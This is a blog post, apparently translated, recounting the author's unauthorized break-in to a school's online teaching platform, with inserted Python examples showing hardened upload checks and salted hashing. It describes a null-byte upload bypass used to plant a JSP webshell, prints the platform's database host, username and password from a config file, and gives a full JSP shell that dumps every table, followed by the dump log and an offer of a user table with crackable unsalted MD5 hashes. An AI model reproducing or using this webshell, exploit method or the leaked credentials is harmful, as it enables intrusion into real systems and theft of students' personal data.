Pentesting an Online Teaching Platform: From Dumping the Database to Running Away


A while back I was helping someone hand in homework on an online teaching platform, and that's how I came across it. I'm definitely not telling you it's the Qingguo Software Network Teaching Platform (青果软件网络教学平台). At first it seemed to be reachable only from the campus intranet...

Anyway, back then I got at it over a remote-control session. Later some bold network admin opened it up to the internet, and I happened to notice. As luck would have it, I was especially idle that day, so I went to poke at it (even though I'm idle every day).
I started out just hoping to find a few XSS, but the more I looked, the more vulnerabilities there turned out to be...

[Image: 2017040600.jpg]
After logging in with a student account there's an "ask a question" feature; a quick test showed a stored XSS there, but that's not the point! I also noticed it lets you upload attachments, with the allowed formats limited to txt, pdf, gif, jpg, rar, doc, bmp, xls, ppt and mp3.

[Image: 2017040601.jpg]
Clever me, of course I thought: if I could upload a webshell here, wouldn't that be sweet!
So I grabbed a random file and captured the upload request.
[Image: 2017040602.jpg]
Nothing of much value in it, just a file size field. I right-clicked and viewed the page source, and found no client-side JavaScript checking the file type. Then I sat staring at the screen for two or three hours of "sage time" (zoning out) until I suddenly found a way around the upload format restriction (okay, I spent most of the day trying).
You'll need Burp Suite or Fiddler for this.
Burp Suite needs a Java runtime to run, and being the neat freak I am... I've never been willing to install one, so I just used Fiddler.
The idea, roughly: get hold of a JSP shell, then name it yuyu.jsp.jpg.

[Image: 2017040603.jpg]
Then use Fiddler to intercept the upload request, switch to the hex view, and change the byte for the "." in front of "jpg" from 0x2E to 0x00. The application's extension check runs on the full string, which still ends in .jpg, but when the name reaches the filesystem it is handled as a C string and cut off at the NUL, so the file actually saved on the server is yuyu.jsp. (This is classic null-byte truncation. It depends on an old Java runtime: since JDK 7u40 the java.io.File methods refuse any path containing a NUL character, so on a current JDK the upload simply fails.)
Then visit http://XXXXX/KingoWJ/uploadfile/yuyu.jsp

[Image: 2017040604.jpg]
Shell obtained!
Next, find the database configuration file.
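The file-name trick above, as an added example that is not part of the original post: it builds the same multipart body with the NUL embedded programmatically instead of by hand in Fiddler's hex view, runs the name through a model of the server's extension check and of the C-string filesystem layer, and shows a hardened check beside it. The form field name, boundary and the content type are assumptions; the allowed-extension list is the one the post reports. It runs offline and sends nothing.

```python
# Added example (not code from the original post or the platform): NUL-byte
# filename truncation in a multipart upload, and a hardened server-side check.
# The field name "file", the boundary and the content type are assumptions.
import os
import secrets
from typing import Optional

# The allowed list as reported in the post.
ALLOWED_EXTENSIONS = {"txt", "pdf", "gif", "jpg", "rar", "doc", "bmp", "xls", "ppt", "mp3"}


def build_multipart(filename: bytes, content: bytes,
                    field: bytes = b"file", boundary: bytes = b"----kingo") -> bytes:
    """Build a raw multipart/form-data body. filename is bytes so a 0x00 can be
    embedded, which is exactly what the Fiddler hex edit does by hand."""
    return (b"--" + boundary + b"\r\n"
            + b'Content-Disposition: form-data; name="' + field + b'"; filename="' + filename + b'"\r\n'
            + b"Content-Type: image/jpeg\r\n\r\n" + content + b"\r\n"
            + b"--" + boundary + b"--\r\n")


def vulnerable_check(filename: str) -> Optional[str]:
    """Models the platform's check as the post describes it: look at the extension
    of the whole string and, if allowed, hand the name unchanged to the file API."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return filename if ext in ALLOWED_EXTENSIONS else None


def native_truncate(path: str) -> str:
    """Models a C-string filesystem layer: the name ends at the first NUL.
    Old JDKs behaved this way; JDK 7u40 and later reject such paths instead."""
    return path.split("\x00", 1)[0]


def hardened_check(filename: str) -> str:
    """Reject NUL, strip any directory part, validate the extension of the base
    name, and never reuse the client's name: return a server-generated one."""
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    # Windows silently drops trailing dots and spaces, so strip them before checking.
    base = os.path.basename(filename.replace("\\", "/")).rstrip(". ")
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: " + ext)
    return secrets.token_hex(16) + "." + ext


def demo() -> dict:
    """Run the attack name through both checks; returns what each layer sees."""
    name = "yuyu.jsp\x00.jpg"                       # the edited filename from the post
    body = build_multipart(name.encode("latin-1"), b"<% /* jsp shell placeholder */ %>")
    accepted = vulnerable_check(name)               # passes: the string ends in ".jpg"
    saved_as = native_truncate(accepted) if accepted else None
    try:
        hardened_check(name)
        hardened = "accepted"
    except ValueError as exc:
        hardened = "rejected: " + str(exc)
    return {
        "wire_hex": name.encode("latin-1").hex(),   # the 2E -> 00 edit, as bytes on the wire
        "multipart_has_nul": b"\x00" in body,
        "vulnerable_accepts": accepted is not None,
        "saved_as": saved_as,                       # "yuyu.jsp": the extension check was bypassed
        "hardened": hardened,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The hardened check also refuses the name because the extension is checked only after NUL is rejected; the generated name means that even an allowed extension never produces a predictable path under the web root.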

E:\KINGOSOFT\KingoWJ\jboss\server\default\.\deploy\KingoWJ.war\WEB-INF\classes\KingoDataSource.xml

The configuration file contains:

<beans>
    <bean id="dataSource" class="com.mchange.v2.c3p0.ComboPooledDataSource" destroy-method="close">
        <property name="driverClass" value="oracle.jdbc.driver.OracleDriver"></property>
        <property name="jdbcUrl" value="jdbc:oracle:thin:@222.193.112.70:1521:orcl"></property>
        <!--
        <property name="user" value="KINGOWJ_NJSJ"></property>
        -->
        <property name="user" value="WLJXPT"></property>
        <property name="password" value="Ytcwangjiao2017"></property>
        <property name="minPoolSize"><value>5</value></property>
        <property name="maxPoolSize"><value>10</value></property>
    </bean>
</beans>

So it's an Oracle database... rare... Anyway, that gave me the database address 222.193.112.70:1521, user WLJXPT and password Ytcwangjiao2017.
So I downloaded Navicat for Oracle, meaning to connect and dump the database, but that didn't work: I couldn't connect at all. There was no wrong-password message, just a timeout, and a telnet to 222.193.112.70:1521 couldn't connect either, so presumably the database only accepts connections from the internal network. I found a student at that school and tried from the dorm network to see whether it would connect... that failed too. Only today did it occur to me (yes! everything above I did several days ago!) that I could simply use the shell to dump the database onto the server's own disk, so I uploaded a database-dump shell (why didn't I think of that days ago? I guess I'm just too kind).

// shell source (JSP, runs on the app server, which can reach the database that the internet cannot)
<%@ page import="java.sql.*" %>
<%@ page import="java.util.*" %>
<%@ page import="java.io.*" %>
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%
try {
    // Output directory on the server. The original had a stray trailing space ("F:/ "),
    // which would have put a leading space in every dump file name.
    String backupDir = "F:/";
    String ex = "1.txt";   // suffix: T_BBS_USERINFO -> T_BBS_USERINFO1.txt, matching the attachment below

    // Connection details copied from KingoDataSource.xml
    String driver = "oracle.jdbc.driver.OracleDriver";
    String url = "jdbc:oracle:thin:@222.193.112.70:1521:orcl";
    String username = "WLJXPT";
    String password = "Ytcwangjiao2017";

    Class.forName(driver);
    Connection conn = DriverManager.getConnection(url, username, password);

    // Enumerate the tables owned by this schema user
    String sql_tables = "select TABLE_NAME from user_tab_comments";
    PreparedStatement ps = conn.prepareStatement(sql_tables);
    ResultSet rs = ps.executeQuery();
    ArrayList<String> tables = new ArrayList<String>();
    while (rs.next()) {
        tables.add(rs.getString(1));
    }
    rs.close();
    ps.close();

    for (int i = 0; i < tables.size(); i++) {
        String table = tables.get(i);
        out.println("Dumping data for table " + table + "...<br />");
        OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir + table + ex), "UTF-8");
        BufferedWriter bw = new BufferedWriter(osw);
        // Table names come from the data dictionary, not from user input
        String sql = "select * from " + table;
        PreparedStatement p = conn.prepareStatement(sql);
        ResultSet r = p.executeQuery();
        ResultSetMetaData rsmeta = r.getMetaData();

        while (r.next()) {
            bw.append("INSERT INTO " + table + " VALUES(");
            // JDBC column indexes are 1-based
            for (int col = 1; col <= rsmeta.getColumnCount(); col++) {
                String v = r.getString(col);
                // Quote every value; doubling embedded single quotes keeps the INSERT loadable
                bw.append("'");
                bw.append(v == null ? "" : v.replace("'", "''"));
                bw.append(col == rsmeta.getColumnCount() ? "'" : "', ");
            }
            bw.append(");");
            bw.newLine();
        }

        bw.flush();
        bw.close();   // also closes osw
        r.close();
        p.close();
    }

    out.println("backup is ok");
    conn.close();
} catch (Exception e) {
    // Show the failure in the response; printStackTrace() only goes to the server log
    out.println("<pre>" + e + "</pre>");
}
out.println("<p><h3>finished</h3></p>");
%>

The output after running it:

Dumping data for table USERSKINS...
Dumping data for table T_ZZ_LESSONCONTENT...
Dumping data for table T_ZZ_CONTENTVISITEDINFO...
Dumping data for table T_ZZ_CONTENTTYPE...
Dumping data for table T_ZY_YJXK...
Dumping data for table T_ZY_XXCC...
Dumping data for table T_ZY_SUBMITWORKTEST...
Dumping data for table T_ZY_SOURCEVIDOLIST...
Dumping data for table T_ZY_SETWORKTEST...
Dumping data for table T_ZY_SETWORK...
Dumping data for table T_ZY_SCHOOL...
Dumping data for table T_ZY_RESOURCEVISITEDINFO...
Dumping data for table T_ZY_RESOURCETYPE...
Dumping data for table T_ZY_RESOURCECONTENT...
Dumping data for table T_ZY_EJXK...
Dumping data for table T_ZY_CORRECTWORKTEST...
Dumping data for table T_ZY_BESTCOURSES...
Dumping data for table T_XL_XS_WORKTESTSCORE...
Dumping data for table T_XL_XS_TESTSTRATEGY...
Dumping data for table T_XL_XS_TESTDTSTRATEGY...
Dumping data for table T_XL_XS_SUBMITWORKTEST...
Dumping data for table T_XL_XS_SETWORK_TYPE...
Dumping data for table T_XL_XS_SETWORKTEST...
Dumping data for table T_XL_XS_SETWORK...
Dumping data for table T_XL_SUBMITWORKTEST...
Dumping data for table T_XL_SETWORK_TYPE...
Dumping data for table T_XL_SETWORKTEST...
Dumping data for table T_XL_SETWORK...
Dumping data for table T_SJ_TESTTYPE...
Dumping data for table T_SJ_TESTSTRATEGY...
Dumping data for table T_SJ_TESTMOLD...
Dumping data for table T_SJ_TESTINFO...
Dumping data for table T_SJ_TESTDTSTRATEGY...
Dumping data for table T_SJ_TESTDIFFICULT...
Dumping data for table T_SJ_SORT_ANSWERCODE...
Dumping data for table T_SJ_SORT...
Dumping data for table T_SJ_SIMPLEANSWER...
Dumping data for table T_SJ_SELECTWORD_ANSWERCODE...
Dumping data for table T_SJ_SELECTWORD...
Dumping data for table T_SJ_READINGCOMPREHENSION...
Dumping data for table T_SJ_RC_SUBJECT_ANSWER...
Dumping data for table T_SJ_RC_SUBJECT...
Dumping data for table T_SJ_ONEVACANT_ANSWER...
Dumping data for table T_SJ_ONEVACANT...
Dumping data for table T_SJ_ONESELECT_ANSWER...
Dumping data for table T_SJ_ONESELECT160517...
Dumping data for table T_SJ_ONESELECT...
Dumping data for table T_SJ_NOUNEXPLAIN...
Dumping data for table T_SJ_MOREVACANT_ANSWER...
Dumping data for table T_SJ_MOREVACANT...
Dumping data for table T_SJ_MORESELECT_ANSWER...
Dumping data for table T_SJ_MORESELECT160517...
Dumping data for table T_SJ_MORESELECT...
Dumping data for table T_SJ_MATCH_QUESTIONCODE...
Dumping data for table T_SJ_MATCH_ANSWERTORIGHT...
Dumping data for table T_SJ_MATCH_ANSWERCODE...
Dumping data for table T_SJ_MATCH...
Dumping data for table T_SJ_LABEL...
Dumping data for table T_SJ_JUDGE...
Dumping data for table T_SJ_FILEANSWER...
Dumping data for table T_SJ_EXPOUND...
Dumping data for table T_SJ_DOTCODE...
Dumping data for table T_SJ_CREATETEST_TYPE...
Dumping data for table T_SJ_CREATETEST_QUEST...
Dumping data for table T_SJ_CREATETEST...
Dumping data for table T_SJ_COUNTNUMBER...
Dumping data for table T_SJ_ANSWERCODE...
Dumping data for table T_PT_ZD_ZTBZ...
Dumping data for table T_PT_ZD_XUEWEI...
Dumping data for table T_PT_ZD_XUEQI...
Dumping data for table T_PT_ZD_XUELI...
Dumping data for table T_PT_ZD_SEX...
Dumping data for table T_PT_ZD_SETPRACTEACH_SORT...
Dumping data for table T_PT_ZD_PROFESSIONINFO...
Dumping data for table T_PT_ZD_LSORT4INFO...
Dumping data for table T_PT_ZD_GANGWEI...
Dumping data for table T_PT_ZD_BUILDINGTYPE...
Dumping data for table T_PT_ZD_BESTCOURSETYPE...
Dumping data for table T_PT_USER_GROUPRIGHT...
Dumping data for table T_PT_USERRIGHT...
Dumping data for table T_PT_USERLIMIT...
Dumping data for table T_PT_USERINFO...
Dumping data for table T_PT_TASK...
Dumping data for table T_PT_STUDENTSTATUS...
Dumping data for table T_PT_STUDBASEINFO...
Dumping data for table T_PT_STATE...
Dumping data for table T_PT_STAFFROOMINFO...
Dumping data for table T_PT_SPECIALTY...
Dumping data for table T_PT_SJJK_APPLICATION...
Dumping data for table T_PT_SETLANMUINFO...
Dumping data for table T_PT_SETLANMU...
Dumping data for table T_PT_SERVERADDRESS...
Dumping data for table T_PT_SCHOOL_NOTICE...
Dumping data for table T_PT_SCHOOLCALENDAR...
Dumping data for table T_PT_SCHOOLAREA...
Dumping data for table T_PT_SCHOOL...
Dumping data for table T_PT_ROLEMENU...
Dumping data for table T_PT_REFUSEIP...
Dumping data for table T_PT_PICNEWS...
Dumping data for table T_PT_PERSONNUMINFO...
Dumping data for table T_PT_NOTIFY...
Dumping data for table T_PT_MENUINFO151014...
Dumping data for table T_PT_MENUINFO...
Dumping data for table T_PT_LOGINLOG...
Dumping data for table T_PT_LINKINFO...
Dumping data for table T_PT_LESSONSCHEDULE...
Dumping data for table T_PT_LESSONCLASS...
Dumping data for table T_PT_KINGOPROBATIONVALIDATE...
Dumping data for table T_PT_INSTITUTEINFO...
Dumping data for table T_PT_IMGXQ...
Dumping data for table T_PT_GROUPRIGHT...
Dumping data for table T_PT_EMPLOYEE...
Dumping data for table T_PT_ELECTIVECOURSE...
Dumping data for table T_PT_DOWNLOADINFO...
Dumping data for table T_PT_CURXNXQ...
Dumping data for table T_PT_COURSEDEPARTMENT...
Dumping data for table T_PT_COURSE...
Dumping data for table T_PT_CLASSROOMINFO...
Dumping data for table T_PT_CLASSINFO...
Dumping data for table T_PT_CITY...
Dumping data for table T_PT_BASEINFO...
Dumping data for table T_PT_APPLYDATE...
Dumping data for table T_PJ_TEACHQUALITY...
Dumping data for table T_PJ_STUYJB...
Dumping data for table T_PJ_STUDEVALRESULT...
Dumping data for table T_PJ_NONSTUDEVALSCOPE...
Dumping data for table T_PJ_NONSTUDEVALMEMBER...
Dumping data for table T_PJ_DEGREE_SETPARAM_PJZT...
Dumping data for table T_PJ_DEGREE_SETPARAM...
Dumping data for table T_PJ_COURSEEVALQUESTION...
Dumping data for table T_PJ_BODY_PERCENT...
Dumping data for table T_PJ_APPRAISE_BODY...
Dumping data for table T_PJ_APPRAISESTANDARD_ANSWER...
Dumping data for table T_PJ_APPRAISESTANDARD...
Dumping data for table T_PJ_APPRAISEITEM...
Dumping data for table T_KT_SETNETLESSON...
Dumping data for table T_KT_ENTERNETLESSON...
Dumping data for table T_KS_SUBMITWORKTEST160517...
Dumping data for table T_KS_SUBMITWORKTEST...
Dumping data for table T_KS_SETWORK_TYPE...
Dumping data for table T_KS_SETWORKTEST...
Dumping data for table T_KS_SETWORK...
Dumping data for table T_KS_SETEXAM...
Dumping data for table T_KS_EXAMWORKSTU...
Dumping data for table T_KS_EXAMWORK...
Dumping data for table T_KS_CORRECTWORKTEST...
Dumping data for table T_JL_SHORTMSGMAPPED...
Dumping data for table T_JL_SHORTMESSAGE...
Dumping data for table T_JL_READNOTE...
Dumping data for table T_JL_QUESTIONTYPE...
Dumping data for table T_JL_QUESTION...
Dumping data for table T_JL_MESSAGE...
Dumping data for table T_JL_FBNOTE...
Dumping data for table T_JL_CREATECHATROOM...
Dumping data for table T_JL_CJQUESTION...
Dumping data for table T_JL_CHATUSER...
Dumping data for table T_JL_ANSQUESTION...
Dumping data for table T_DATATABLE...
Dumping data for table T_DATACOLUMN...
Dumping data for table T_DATABOOK_DETAIL...
Dumping data for table T_DATABOOK...
Dumping data for table T_CJ_SUBMITSCORE_MX160517...
Dumping data for table T_CJ_SUBMITSCORE_MX...
Dumping data for table T_CJ_SUBMITSCORE...
Dumping data for table T_CJ_SCOREQZ...
Dumping data for table TW_SYSSET...
Dumping data for table TW_SYSMENUINFO...
Dumping data for table TW_BBS_TUNUSE...
Dumping data for table TW_BBS_TRECENT...
Dumping data for table TW_BBS_TMEMBER...
Dumping data for table TW_BBS_TINDEX...
Dumping data for table TW_BBS_TCONTENT...
Dumping data for table TW_BBS_TCONFIG...
Dumping data for table TW_BBS_MCONFIG...
Dumping data for table TUIA_MENUINFO...
Dumping data for table TEMP_SUBMITWORKTEST...
Dumping data for table PLAN_TABLE...
Dumping data for table JFORUM_WORDS...
Dumping data for table JFORUM_VOTE_VOTERS...
Dumping data for table JFORUM_VOTE_RESULTS...
Dumping data for table JFORUM_VOTE_DESC...
Dumping data for table JFORUM_USER_GROUPS...
Dumping data for table JFORUM_USERS...
Dumping data for table JFORUM_TOPICS_WATCH...
Dumping data for table JFORUM_TOPICS...
Dumping data for table JFORUM_THEMES...
Dumping data for table JFORUM_SMILIES...
Dumping data for table JFORUM_SESSIONS...
Dumping data for table JFORUM_ROLE_VALUES...
Dumping data for table JFORUM_ROLES...
Dumping data for table JFORUM_RANKS...
Dumping data for table JFORUM_QUOTA_LIMIT...
Dumping data for table JFORUM_PRIVMSGS_TEXT...
Dumping data for table JFORUM_PRIVMSGS...
Dumping data for table JFORUM_POSTS_TEXT...
Dumping data for table JFORUM_POSTS...
Dumping data for table JFORUM_MODERATION_LOG...
Dumping data for table JFORUM_KARMA...
Dumping data for table JFORUM_GROUPS...
Dumping data for table JFORUM_FORUMS_WATCH...
Dumping data for table JFORUM_FORUMS...
Dumping data for table JFORUM_EXTENSION_GROUPS...
Dumping data for table JFORUM_EXTENSIONS...
Dumping data for table JFORUM_CONFIG...
Dumping data for table JFORUM_CATEGORIES...
Dumping data for table JFORUM_BOOKMARKS...
Dumping data for table JFORUM_BANNER...
Dumping data for table JFORUM_BANLIST...
Dumping data for table JFORUM_ATTACH_QUOTA...
Dumping data for table JFORUM_ATTACH_DESC...
Dumping data for table JFORUM_ATTACH...
Dumping data for table DLOG_USER...
Dumping data for table DLOG_T_REPLY...
Dumping data for table DLOG_TYPE...
Dumping data for table DLOG_TRACKBACK...
Dumping data for table DLOG_TOPIC...
Dumping data for table DLOG_TAG...
Dumping data for table DLOG_SITE_STAT...
Dumping data for table DLOG_SITE...
Dumping data for table DLOG_P_REPLY...
Dumping data for table DLOG_PHOTO...
Dumping data for table DLOG_MY_BLACKLIST...
Dumping data for table DLOG_MUSICBOX...
Dumping data for table DLOG_MUSIC...
Dumping data for table DLOG_MESSAGE...
Dumping data for table DLOG_LINK...
Dumping data for table DLOG_J_REPLY...
Dumping data for table DLOG_GUESTBOOK...
Dumping data for table DLOG_FRIEND...
Dumping data for table DLOG_FORUM...
Dumping data for table DLOG_FCK_UPLOAD_FILE...
Dumping data for table DLOG_EXTERNAL_REFER...
Dumping data for table DLOG_DIARY...
Dumping data for table DLOG_CONFIG...
Dumping data for table DLOG_COMMENTS...
Dumping data for table DLOG_CATALOG_PERM...
Dumping data for table DLOG_CATALOG...
Dumping data for table DLOG_BULLETIN...
Dumping data for table DLOG_BOOKMARK...
Dumping data for table DLOG_BLOCKED_IP...
Dumping data for table DLOG_ALBUM...
Dumping data for table DATAUSER...
Dumping data for table CODESET...
Dumping data for table CODEOBJECT...
Dumping data for table ACCOUNT...
Dumping data for table WEB_BBS_TMEMBER...
Dumping data for table T_BBS_USERINFO...
backup is ok
finished

And with that the whole database was downloaded. The passwords are all MD5 hashed, but none are salted, so they're still easy to look up.
Finally, here's one sanitized data table for study and research:
T_BBS_USERINFO1.txt
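As an added example (not from the original post) of the point about unsalted MD5: with no salt, every account with the same password has the same hash and one precomputed table cracks all of them at once; a per-user random salt plus an iterated hash removes both properties. The user records and the word list below are constructed for the demo and are not data from the platform's dump.

```python
# Added example (not from the original post): recovering unsalted MD5 password
# hashes with a lookup table, beside a salted, iterated replacement.
# LEAKED_ROWS and WORDLIST are constructed for this demo; they are not real data.
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional


def md5_hex(password: str) -> str:
    """Raw MD5 of the password: what the platform stored, per the post."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


# Constructed: two accounts that happen to share a weak password, and one strong one.
LEAKED_ROWS = {
    "stu001": md5_hex("123456"),
    "stu002": md5_hex("123456"),
    "teach01": md5_hex("Zz!9qLp#2m"),
}
# Constructed, deliberately tiny; a real attacker uses millions of entries or a rainbow table.
WORDLIST = ["password", "123456", "qwerty", "111111", "abc123"]


def crack_unsalted(rows: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """One table built from the word list serves every account at once:
    without a salt, identical passwords give identical hashes."""
    table = {md5_hex(word): word for word in wordlist}
    return {user: table.get(digest) for user, digest in rows.items()}


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """PBKDF2-HMAC-SHA256 with a 16-byte random salt per user (600k iterations is
    the OWASP figure for PBKDF2-SHA256). The salt makes shared passwords
    indistinguishable and precomputed tables useless; the iterations slow guessing."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(crack_unsalted(LEAKED_ROWS, WORDLIST))   # both students fall, the teacher does not
    a, b = hash_password("123456"), hash_password("123456")
    print(a == b, verify_password("123456", a), verify_password("wrong", a))
```

The lookup cracks both student accounts with one table because their hashes are byte-for-byte identical; the same two passwords hashed with hash_password produce different records, and only verify_password, which re-derives with the stored salt, can tell that they match.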
